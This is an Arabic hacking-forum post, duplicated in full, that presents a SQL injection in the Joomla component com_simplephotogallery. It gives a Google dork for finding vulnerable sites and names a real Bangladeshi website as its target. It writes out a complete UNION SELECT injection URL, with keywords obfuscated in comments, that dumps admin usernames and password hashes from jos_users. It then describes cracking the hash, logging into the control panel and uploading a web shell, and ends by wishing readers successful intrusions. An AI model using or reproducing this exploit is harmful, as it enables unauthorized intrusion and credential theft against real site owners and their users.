Cyb3Rm0uJah3D
11-16-2013, 12:25 PM
http://img97.imageshack.us/img97/690/salamh.gif
أعضاء و زوار جيوش الهكرز، لكم مني أجمل تحية
http://img87.imageshack.us/img87/1498/913e588354hs6gi8.png
من إكتشافي، ثغرة SQL injection في سكربت جوملا com_simplephotogallery
http://img87.imageshack.us/img87/1498/913e588354hs6gi8.png
الشــــــــــــــــرح
نضع الدرك في محرك البحث google
inurl:"index.php?option=com_simplephotogallery"
جل هذه المواقع مصابة
http://up.phphost.biz/images/86391117944363087554.png
أنا إخترت هذا الموقع
http://www.nbc.org.bd/
نضيف هذا الإستغلال مباشرة بعد رابط الموقع
index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 ,11,12+from+jos_users--+
فيصبح الرابط هكذا
http://www.nbc.org.bd/index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 ,11,12+from+jos_users--+
سنتحصل على يوزر و باس الأدمن
http://up.phphost.biz/images/64075115029476916886.png
بعد فك الهاش ندخل لوحة التحكم و نرفع الشل
http://up.phphost.biz/images/17585147327025679274.png
ختاما، أتمنى لكم إختراقات موفقة
http://img828.imageshack.us/img828/8025/jhghgfgh254.gif
أعضاء و زوار جيوش الهكرز، لكم مني أجمل تحية
http://img87.imageshack.us/img87/1498/913e588354hs6gi8.png
من إكتشافي، ثغرة SQL injection في سكربت جوملا com_simplephotogallery
http://img87.imageshack.us/img87/1498/913e588354hs6gi8.png
الشــــــــــــــــرح
نضع الدرك في محرك البحث google
inurl:"index.php?option=com_simplephotogallery"
جل هذه المواقع مصابة
http://up.phphost.biz/images/86391117944363087554.png
أنا إخترت هذا الموقع
http://www.nbc.org.bd/
نضيف هذا الإستغلال مباشرة بعد رابط الموقع
index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 ,11,12+from+jos_users--+
فيصبح الرابط هكذا
http://www.nbc.org.bd/index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 ,11,12+from+jos_users--+
سنتحصل على يوزر و باس الأدمن
http://up.phphost.biz/images/64075115029476916886.png
بعد فك الهاش ندخل لوحة التحكم و نرفع الشل
http://up.phphost.biz/images/17585147327025679274.png
ختاما، أتمنى لكم إختراقات موفقة
http://img828.imageshack.us/img828/8025/jhghgfgh254.gif